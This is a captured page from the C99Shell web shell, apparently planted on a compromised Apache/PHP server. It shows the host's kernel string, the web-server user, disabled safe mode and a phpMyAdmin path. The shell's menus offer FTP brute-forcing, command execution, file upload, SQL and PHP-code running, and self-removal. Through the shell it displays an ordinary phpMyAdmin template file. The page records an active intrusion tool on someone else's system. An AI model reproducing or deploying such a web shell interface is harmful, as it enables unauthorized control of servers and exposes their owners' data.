!C99Shell v. 1.0 pre-release build #16!

Software: Apache/2.0.54 (Fedora). PHP/5.0.4 

uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686 

uid=48(apache) gid=48(apache) groups=48(apache)
context=system_u:system_r:httpd_sys_script_t
 

Safe-mode: OFF (not secure)

/home/mnnews/public_html/login/phpmyadmin/templates/table/structure/   drwxr-xr-x
Free 1.2 GB of 27.03 GB (4.43%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     actions_in_table_structure.phtml (6.2 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<td class="print_ignore"><ul class="table-structure-actions resizable-menu">
    <!-- Add primary -->
    <?php
        
echo PMATemplate::get('table/structure/action_row_in_structure_table')->render(
            array(
                
'type' => $type,
                
'tbl_storage_engine' => $tbl_storage_engine,
                
'class' => 'primary nowrap',
                
'hasField' => ($primary && $primary->hasColumn($field_name)),
                
'hasLinkClass' => true,
                
'url_query' => $url_query,
                
'primary' => $primary,
                
'syntax' => 'ADD PRIMARY KEY',
                
'message' => __('A primary key has been added on %s.'),
                
'action' => 'Primary',
                
'titles' => $titles,
                
'row' => $row,
                
'isPrimary' => true
            
)
        );
    
?>
    <!-- Add unique -->
    <?php
        
echo PMATemplate::get('table/structure/action_row_in_structure_table')->render(
            array(
                
'type' => $type,
                
'tbl_storage_engine' => $tbl_storage_engine,
                
'class' => 'add_unique unique nowrap',
                
'hasField' => in_array($field_name, $columns_with_unique_index),
                
'hasLinkClass' => false,
                
'url_query' => $url_query,
                
'primary' => $primary,
                
'syntax' => 'ADD UNIQUE',
                
'message' => __('An index has been added on %s.'),
                
'action' => 'Unique',
                
'titles' => $titles,
                
'row' => $row,
                
'isPrimary' => false
            
)
        );
    
?>
    <!-- Add index -->
    <?php
        
echo PMATemplate::get('table/structure/action_row_in_structure_table')->render(
            array(
                
'type' => $type,
                
'tbl_storage_engine' => $tbl_storage_engine,
                
'class' => 'add_index nowrap',
                
'hasField' => false,
                
'hasLinkClass' => false,
                
'url_query' => $url_query,
                
'primary' => $primary,
                
'syntax' => 'ADD INDEX',
                
'message' => __('An index has been added on %s.'),
                
'action' => 'Index',
                
'titles' => $titles,
                
'row' => $row,
                
'isPrimary' => false
            
)
        );
    
?>
    <?php if (!PMA_DRIZZLE): ?>
        <!-- Add spatial -->
        <?php
            $spatial_types
= array(
                
'geometry', 'point', 'linestring', 'polygon', 'multipoint',
                
'multilinestring', 'multipolygon', 'geomtrycollection'
            
);
            echo
PMATemplate::get('table/structure/action_row_in_structure_table')->render(
                array(
                    
'type' => $type,
                    
'tbl_storage_engine' => $tbl_storage_engine,
                    
'class' => 'spatial nowrap',
                    
'hasField' => ! (in_array($type, $spatial_types) && ('MYISAM' == $tbl_storage_engine || PMA_MYSQL_INT_VERSION >= 50705)),
                    
'hasLinkClass' => false,
                    
'url_query' => $url_query,
                    
'primary' => $primary,
                    
'syntax' => 'ADD SPATIAL',
                    
'message' => __('An index has been added on %s.'),
                    
'action' => 'Spatial',
                    
'titles' => $titles,
                    
'row' => $row,
                    
'isPrimary' => false
                
)
            );
        
?>
        <!-- FULLTEXT is possible on TEXT, CHAR and VARCHAR -->
        <li class="fulltext nowrap">
        <?php if (! empty($tbl_storage_engine)
                    && (
$tbl_storage_engine == 'MYISAM'
                    
|| $tbl_storage_engine == 'ARIA'
                    
|| $tbl_storage_engine == 'MARIA'
                    
|| ($tbl_storage_engine == 'INNODB' && PMA_MYSQL_INT_VERSION >= 50604))
                    && (
/*overload*/mb_strpos($type, 'text') !== false
                    
|| /*overload*/mb_strpos($type, 'char') !== false)
                ):
?>
            <a rel="samepage" class="ajax add_key add_fulltext_anchor" href="tbl_structure.php<?php echo $url_query; ?>&amp;add_key=1&amp;sql_query=<?php echo urlencode(
                
'ALTER TABLE ' . PMA_Util::backquote($GLOBALS['table'])
                .
' ADD FULLTEXT(' . PMA_Util::backquote($row['Field'])
                .
');'); ?>&amp;message_to_show=<?php echo urlencode(sprintf(
                    
__('An index has been added on %s.'),
                    
htmlspecialchars($row['Field']))); ?>">
                <?php echo $titles['IdxFulltext']; ?>
            </a>
        <?php else: ?>
            <?php echo $titles['NoIdxFulltext']; ?>
        <?php endif; ?>
        </li>
    <?php endif; ?>
    <!-- Distinct value action -->
    <li class="browse nowrap">
        <a href="sql.php<?php echo $url_query; ?>&amp;sql_query=<?php echo urlencode(
                
'SELECT COUNT(*) AS ' . PMA_Util::backquote(__('Rows'))
                .
', ' . PMA_Util::backquote($row['Field'])
                .
' FROM ' . PMA_Util::backquote($GLOBALS['table'])
                .
' GROUP BY ' . PMA_Util::backquote($row['Field'])
                .
' ORDER BY ' . PMA_Util::backquote($row['Field'])
            );
?>&amp;is_browse_distinct=1">
            <?php echo $titles['DistinctValues']; ?>
        </a>
    </li>
    <?php if ($GLOBALS['cfgRelation']['centralcolumnswork']): ?>
        <li class="browse nowrap">
        <?php if ($isInCentralColumns): ?>
            <a href="#" onclick=$("input:checkbox").prop("checked",false);
            $("#checkbox_row_' . $rownum . '").prop("checked",true);
            $("button[value=remove_from_central_columns]").click();>
            <?php echo PMA_Util::getIcon(
                
'centralColumns_delete.png',
                
__('Remove from central columns')
            );
?></a>
        <?php else: ?>
            <a href="#" onclick=$("input:checkbox").prop("checked",false);
            $("#checkbox_row_' . $rownum . '").prop("checked",true);
            $("button[value=add_to_central_columns]").click();>
            <?php echo PMA_Util::getIcon(
                
'centralColumns_add.png',
                
__('Add to central columns')
            );
?></a>
        <?php endif; ?>
        </li>
    <?php endif; ?>
</ul></td>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0046 ]--